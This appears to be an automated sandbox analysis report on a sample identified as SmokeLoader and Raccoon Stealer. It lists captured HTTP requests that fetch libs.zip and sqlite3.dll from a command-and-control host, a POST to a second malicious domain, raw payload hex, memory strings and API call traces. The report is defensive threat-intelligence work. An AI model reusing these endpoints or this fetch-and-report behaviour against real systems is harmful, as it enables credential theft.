Source: global traffic	HTTP traffic detected: GET /gate/libs.zip HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: chinadevmonster.topConnection: Keep-Alive

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_004336F3 LoadLibraryA,FreeLibrary,LoadLibraryA,GetProcAddress,URLDownloadToFileA,

4_2_004336F3

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 13 Sep 2020 18:55:12 GMTContent-Type: application/zipContent-Length: 2828315Connection: closeLast-Modified: Wed, 03 Apr 2019 07:47:18 GMTETag: "5ca46506-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11

Source: global traffic	HTTP traffic detected: GET /gate/sqlite3.dll HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: chinadevmonster.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gate/libs.zip HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: chinadevmonster.topConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: dkajsdjiqwdwnfj.info

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://2831ujedkdajsdj.info/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: 2831ujedkdajsdj.info

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Sun, 13 Sep 2020 18:54:41 GMTContent-Type: text/html; charset=windows-1251Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/7.2.31Data Raw: 31 38 0d 0a 13 00 00 00 63 07 35 6e ed cd cf 93 0a 8d c8 6b 6d 7d e5 a4 9e 64 5c 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 18c5nkm}d\0

Source: explorer.exe, 00000002.00000003.1406505926.000000000AC63000.00000004.00000001.sdmp	String found in binary or memory: http://2831ujedkdajsdj.info/
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: http://cert.int-x3.letsencrypt.org/0Y
Source: 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp	String found in binary or memory: http://chinadevmonster.top/
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: http://chinadevmonster.top/file_handler4/file.php?hash=29a48d36455677adfa3fd9866445462d19dfa596&js=c
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1531805660.000000004B415000.00000004.00000001.sdmp	String found in binary or memory: http://chinadevmonster.top/gate
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: http://chinadevmonster.top/gate/libs.zip
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp	String found in binary or memory: http://chinadevmonster.top/gate/log.php
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp	String found in binary or memory: http://chinadevmonster.top/gate/log.phpditional
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp	String found in binary or memory: http://chinadevmonster.top/gate/log.phpn
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: http://chinadevmonster.top/gate/sqlite3.dll
Source: 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp	String found in binary or memory: http://chinadevmonster.top/gate/sqlite3.dllnnel%
Source: 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp	String found in binary or memory: http://chinadevmonster.top/gatea
Source: 3BD3.exe, 00000004.00000002.1528758602.00000000007AD000.00000004.00000001.sdmp	String found in binary or memory: http://chinadevmonster.top/gatel
Source: nssckbi.dll.4.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: 3BD3.exe, 00000004.00000002.1530773523.000000004B38A000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letm6
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.4.dr	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: nssckbi.dll.4.dr	String found in binary or memory: http://ocsp.accv.es0
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://repository.swisssign.com/0
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	String found in binary or memory: http://ss.ask.com/query?q=
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: explorer.exe, 00000002.00000000.1293389954.00000000014B0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.accv.es00
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: mozglue.dll.4.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: http://www.mozilla.com0
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehph
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: sqlite3.dll.4.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.1320309521.000000000C7B6000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	String found in binary or memory: https://autosuggest.search.aol.com/autocomplete/get?output=json&it=&q=
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: 3BD3.exe, 00000004.00000002.1530759275.000000004B380000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com
Source: nssckbi.dll.4.dr	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.4.dr	String found in binary or memory: https://repository.luxtrust.lu0
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	String found in binary or memory: https://search.aol.com/favicon.icohttps://search.aol.com/aol/search?q=
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search?ei=
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	String found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.icohttps://www.ask.com/web?q=
Source: y2017hGX7.4.dr	String found in binary or memory: https://support.mozilla.org
Source: y2017hGX7.4.dr	String found in binary or memory: https://support.mozilla.org/en-US/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire
Source: y2017hGX7.4.dr	String found in binary or memory: https://support.mozilla.org/en-US/products/firefoxgro.allizom.troppus.
Source: 3BD3.exe, 00000004.00000002.1528044132.0000000000726000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528424101.000000000075E000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/jarkadiyvolniy
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/org/img/t_logo.png
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp	String found in binary or memory: https://tenadevmonster.top/
Source: nssckbi.dll.4.dr	String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.4.dr	String found in binary or memory: https://www.catcert.net/verarrel05
Source: AccessibleHandler.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 3BD3.exe, 00000004.00000003.1495277519.000000004B3B4000.00000004.00000001.sdmp, 1xVPfvJcrg.4.dr	String found in binary or memory: https://www.google.com/favicon.ico
Source: y2017hGX7.4.dr	String found in binary or memory: https://www.mozilla.org
Source: y2017hGX7.4.dr	String found in binary or memory: https://www.mozilla.org/en-US/about/gro.allizom.www.
Source: y2017hGX7.4.dr	String found in binary or memory: https://www.mozilla.org/en-US/contribute/gro.allizom.www.
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, 3BD3.exe, 00000004.00000002.1530773523.000000004B38A000.00000004.00000001.sdmp, firefox_urls.txt.4.dr	String found in binary or memory: https://www.mozilla.org/en-US/firefox/61.0.1/firstrun/
Source: y2017hGX7.4.dr	String found in binary or memory: https://www.mozilla.org/en-US/firefox/61.0.1/firstrun/Welcome
Source: 3BD3.exe, 00000004.00000002.1530773523.000000004B38A000.00000004.00000001.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/firefox/61.0.1/firstrun/vV
Source: y2017hGX7.4.dr	String found in binary or memory: https://www.mozilla.org/en-US/firefox/central/gro.allizom.www.
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, firefox_urls.txt.4.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: y2017hGX7.4.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: y2017hGX7.4.dr	String found in binary or memory: https://www.mozilla.org/media/img/firefox/template/page-image-master.1b6efe3d5631.jpg
Source: y2017hGX7.4.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 3BD3.exe, 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, firefox_urls.txt.4.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: y2017hGX7.4.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1267461020.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1451110742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1428267644.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.y98WYYcJ2U.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.y98WYYcJ2U.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.y98WYYcJ2U.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cwfbibg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cwfbibg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.cwfbibg.1f0000.0.raw.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\3BD3.exe

Code function: 4_2_00425145 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,

4_2_00425145

Source: 48F3.exe, 00000005.00000002.1653465876.000000000621A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000003.1518715900.000000004B3BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3BD3.exe PID: 4680, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\LocalLow\machineinfo.txt, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\48F3.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_0040182B Sleep,NtTerminateProcess,	0_2_0040182B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00402440 NtClose,	0_2_00402440
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_0040184B Sleep,NtTerminateProcess,	0_2_0040184B
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00401856 Sleep,NtTerminateProcess,	0_2_00401856
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00401837 Sleep,NtTerminateProcess,	0_2_00401837
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00401600 NtMapViewOfSection,	0_2_00401600
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_00401758 Sleep,NtTerminateProcess,	0_2_00401758
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_004017DA NtTerminateProcess,	0_2_004017DA
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_004023E8 NtClose,	0_2_004023E8
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A360 ZwAllocateVirtualMemory,LdrInitializeThunk,	0_2_7268A360
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A37A NtQueryInformationProcess,LdrInitializeThunk,	0_2_7268A37A
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A300 ZwOpenKey,LdrInitializeThunk,	0_2_7268A300
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A6A0 ZwCreateSection,LdrInitializeThunk,	0_2_7268A6A0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A480 ZwMapViewOfSection,LdrInitializeThunk,	0_2_7268A480
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A560 ZwQuerySystemInformation,LdrInitializeThunk,	0_2_7268A560
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A520 ZwEnumerateKey,LdrInitializeThunk,	0_2_7268A520
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A5C0 ZwDuplicateObject,LdrInitializeThunk,	0_2_7268A5C0
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A260 ZwWriteFile,	0_2_7268A260
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726CA27C RtlAllocateHeap,ZwQueryVirtualMemory,RtlFreeHeap,	0_2_726CA27C
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72645275 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,	0_2_72645275
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268B270 ZwLockVirtualMemory,	0_2_7268B270
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A240 ZwReadFile,	0_2_7268A240
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_726C825D ZwRaiseHardError,	0_2_726C825D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72701243 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,	0_2_72701243
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72718248 ZwAlertThreadByThreadId,	0_2_72718248
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7268A220 ZwWaitForSingleObject,	0_2_7268A220
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267523D ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,	0_2_7267523D
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72688200 EtwpCreateEtwThread,ZwResumeThread,EtwpCreateEtwThread,ZwTerminateThread,ZwClose,	0_2_72688200
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_7267A20E RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker,	0_2_7267A20E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe	Code function: 0_2_72648209 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose,	0_2_72648209
